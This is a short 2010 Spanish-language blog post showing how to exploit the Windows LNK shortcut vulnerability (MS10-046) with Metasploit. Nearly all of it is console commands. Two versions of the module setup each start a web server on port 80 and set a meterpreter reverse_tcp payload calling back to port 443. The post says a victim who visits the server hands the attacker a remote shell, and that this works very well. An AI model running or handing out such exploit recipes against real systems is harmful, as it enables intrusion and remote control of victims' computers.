27 nov. 2010

Explotando "LNK" con MetaSploit

MetaSploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.
Para testear esta vulnerabilidad primero debemos actualizar el framework con "svn update", y luego hacemos lo siguiente:

Antiguo

use windows/browser/ms10_xxx_windows_shell_lnk_execute

set SRVHOST 192.168.162.136

set SRVPORT 80

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.162.136

set LPORT 443

exploit

Nuevo
use windows/browser/ms10_046_shortcut_icon_dllloader

set SRVHOST 192.168.162.136

set SRVPORT 80

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.162.136

set LPORT 443

exploit


De esta forma vamos a levantar un servidor web en el puerto 80, que cuando la víctima lo visite, nos dará una shell de meterpreter a través del puerto 443. Funciona muy bien!